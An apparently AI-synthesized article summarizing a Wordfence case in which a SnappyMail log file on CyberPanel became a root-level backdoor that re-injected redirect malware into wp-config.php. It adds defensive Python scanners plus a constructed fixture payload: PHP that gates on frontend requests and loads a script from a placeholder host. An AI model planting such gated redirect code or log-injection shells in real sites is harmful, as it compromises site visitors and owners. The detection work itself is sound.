Research · Published May 20, 2026 · 1 source

How a Webmail Log File Became a Root-Level Backdoor

Wordfence details a CyberPanel attack chain where SnappyMail logs were abused as a root-level backdoor to repeatedly inject redirect malware into WordPress sites.

Wordfence has published a forensic case study detailing how attackers turned CyberPanel's SnappyMail webmail logging into a persistent root-level backdoor, enabling repeated injection of redirect malware into a WordPress site's wp-config.php file. The attack chain, which survived every standard WordPress cleanup attempt, leveraged server-level persistence completely invisible to WordPress security tools.

The malware consisted of a single line of double-encoded base64 injected at the top of wp-config.php. The decoded payload evaded detection by running only on frontend page loads: it skipped the WordPress admin panel, the REST API, AJAX requests, the login page, and any XHR request. Site owners could therefore browse the admin panel without ever triggering the malware, while ordinary visitors received redirect popups and Yandex Metrica tracking.
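The following is an added example, not code from the Wordfence post and not the real payload: a small Python scanner that finds an `eval(base64_decode(base64_decode('...')))` line in a wp-config.php, peels off the base64 layers, and reports which of the request-type guards described above the hidden code contains. The injection shape, the inner PHP snippet, and the placeholder domain `redirect.example` are assumptions constructed for the demonstration.

```python
import base64
import binascii
import re

# Assumed shape of the injected line: eval() around one or more nested
# base64_decode() calls on a quoted literal blob. The real payload is not
# reproduced here; a real scanner should also match other wrappers.
INJECTION_RE = re.compile(
    r"""eval\s*\(\s*((?:base64_decode\s*\(\s*)+)['"]([A-Za-z0-9+/=]+)['"]""",
    re.IGNORECASE,
)

# PHP symbols a frontend-only payload would test, mapped to the request type
# the article says was excluded.
GATE_MARKERS = {
    "is_admin(": "admin panel",
    "REST_REQUEST": "REST API",
    "DOING_AJAX": "AJAX",
    "wp-login.php": "login page",
    "HTTP_X_REQUESTED_WITH": "XHR",
}


def decode_layers(blob: str, max_layers: int = 8) -> tuple[str, int]:
    """Strip nested base64 layers until the text is no longer valid base64.
    Returns (decoded_text, layers_removed)."""
    current, layers = blob, 0
    while layers < max_layers:
        try:
            text = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        current, layers = text, layers + 1
    return current, layers


def scan_wp_config(source: str) -> list[dict]:
    """Locate encoded eval() lines, decode them, and list the guards found."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        m = INJECTION_RE.search(line)
        if not m:
            continue
        decoded, layers = decode_layers(m.group(2))
        findings.append({
            "line": lineno,
            "declared_layers": m.group(1).lower().count("base64_decode"),
            "decoded_layers": layers,
            "gates": [label for marker, label in GATE_MARKERS.items() if marker in decoded],
            "decoded": decoded,
        })
    return findings


# Constructed inner payload illustrating the frontend-only gating; NOT the
# attacker's code. redirect.example is a placeholder domain.
INNER_PAYLOAD = (
    "<?php if (!is_admin() && !defined('REST_REQUEST') && !defined('DOING_AJAX')"
    " && strpos($_SERVER['REQUEST_URI'], 'wp-login.php') === false"
    " && empty($_SERVER['HTTP_X_REQUESTED_WITH']))"
    " { echo '<script src=\"https://redirect.example/x.js\"></script>'; }"
)


def double_b64(text: str) -> str:
    """Encode twice, the way the injected blob on the page was layered."""
    once = base64.b64encode(text.encode()).decode()
    return base64.b64encode(once.encode()).decode()


# Constructed wp-config.php fixture with the injection on line 2.
SAMPLE_WP_CONFIG = (
    "<?php\n"
    f"eval(base64_decode(base64_decode('{double_b64(INNER_PAYLOAD)}')));\n"
    "define('DB_NAME', 'wordpress');\n"
    "define('DB_USER', 'wp');\n"
)

if __name__ == "__main__":
    for f in scan_wp_config(SAMPLE_WP_CONFIG):
        print(f"line {f['line']}: {f['decoded_layers']} base64 layers, "
              f"guards: {', '.join(f['gates'])}")
        print(f["decoded"])
```

Running it on the fixture reports one finding on line 2 with two decoded layers and all five guards. In practice broaden the pattern: redirect droppers also wrap the blob in `gzinflate`, `str_rot13` or string concatenation, so a grep for `base64_decode` alone will miss variants.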

The malicious domain async.gsyndication.com is a typosquat of Google's legitimate googlesyndication.com, registered on October 15, 2024, and linked to 29+ other malicious domains in similar redirect campaigns. VirusTotal flagged it as malicious with a reputation score of -1.

A comprehensive WordPress-level forensic audit by Wordfence found no rogue files, no database injections, no compromised admin accounts, and no malicious cron jobs. However, while the audit was still under way, the site owner reported that the symptoms had returned: the base64 payload had reappeared in wp-config.php on the live production server.

With WordPress ruled out, investigators searched the entire filesystem for the payload string and found it in /usr/local/CyberCP/public/snappymail/data/_data_/_default_/logs/shell.php, a 1.2MB PHP file in the SnappyMail webmail logs directory, well outside the WordPress webroot. That file, not anything inside WordPress, was the source of the repeated re-injection, which is why every WordPress-level cleanup failed to hold.

Reading the log file revealed that the entire compromise took 14 seconds. The attacker logged into the SnappyMail admin panel using default credentials, then abused SnappyMail's logging so that attacker-supplied content was written verbatim into a log file named shell.php: by sending a crafted email containing PHP code, the attacker caused SnappyMail to write that code into shell.php. Because the file sat under a web-accessible directory and carried a .php extension, it could be requested over HTTP and executed commands as the root user.

Wordfence recommends that CyberPanel users change the default SnappyMail admin credentials, disable logging if it is not needed, restrict access to SnappyMail's admin panel, and monitor for suspicious log files, in particular anything with a server-executable extension such as .php under the logs directory. The case underscores the importance of server-level security monitoring beyond WordPress-focused tools.
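As an added example (not the Wordfence team's tooling), the two checks that closed this case can be scripted: a filesystem-wide search for the payload marker outside the site's webroot, as in the hunt that located shell.php, plus a check for PHP-executable files in the SnappyMail logs directory. The SnappyMail logs path is the one from the case; the WordPress webroot `home/example.com/public_html`, the marker string, and the directory tree it builds in a temporary folder are constructed assumptions for the demonstration.

```python
import tempfile
from pathlib import Path
from typing import Optional

# Path from the case, relative to the filesystem root.
SNAPPYMAIL_LOG_DIR = "usr/local/CyberCP/public/snappymail/data/_data_/_default_/logs"
# Assumed site webroot; adjust to the real site.
WP_ROOT = "home/example.com/public_html"
# Constructed marker standing in for the injected line; not the real blob.
PAYLOAD_MARKER = b"eval(base64_decode(base64_decode("

# Logs should never carry an extension the web server will execute.
EXEC_SUFFIXES = {".php", ".phtml", ".php5", ".php7", ".phar"}


def php_files_under(dir_path: Path) -> list:
    """Return executable-extension files anywhere below a logs directory."""
    if not dir_path.is_dir():
        return []
    return sorted(p for p in dir_path.rglob("*")
                  if p.is_file() and p.suffix.lower() in EXEC_SUFFIXES)


def files_containing(root: Path, marker: bytes, skip: Optional[Path] = None) -> list:
    """Walk the whole tree for the marker, optionally skipping the webroot so
    only persistence living outside WordPress is reported."""
    hits = []
    for p in root.rglob("*"):
        if not p.is_file() or (skip is not None and skip in p.parents):
            continue
        try:
            if marker in p.read_bytes():
                hits.append(p)
        except OSError:
            continue
    return sorted(hits)


def audit(root: Path) -> dict:
    """Run both checks against a filesystem rooted at `root`."""
    def rel(paths):
        return [p.relative_to(root).as_posix() for p in paths]
    return {
        "php_in_snappymail_logs": rel(php_files_under(root / SNAPPYMAIL_LOG_DIR)),
        "payload_outside_webroot": rel(files_containing(root, PAYLOAD_MARKER, skip=root / WP_ROOT)),
    }


def build_sample_tree(root: Path) -> None:
    """Constructed fixture: a clean WordPress install, a normal SnappyMail log,
    and a PHP file in the logs directory carrying the marker."""
    log_dir = root / SNAPPYMAIL_LOG_DIR
    log_dir.mkdir(parents=True)
    (log_dir / "shell.php").write_bytes(b"<?php " + PAYLOAD_MARKER + b"'QUJD')));\n")
    (log_dir / "snappymail.log").write_text("[INFO] IMAP login ok\n")
    wp = root / WP_ROOT
    wp.mkdir(parents=True)
    (wp / "wp-config.php").write_text("<?php\ndefine('DB_NAME', 'wordpress');\n")
    (wp / "index.php").write_text("<?php require 'wp-blog-header.php';\n")


def run_sample_audit() -> dict:
    """Build the fixture in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return audit(root)


if __name__ == "__main__":
    for check, paths in run_sample_audit().items():
        print(check, paths or "clean")
```

Against a real server run `audit(Path("/"))` with the real webroot and, for the marker, a distinctive substring of the actual injected line; both checks flag the same shell.php in the fixture, which is the signal that wp-config.php is being rewritten from outside WordPress.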

Synthesized by Vypr AI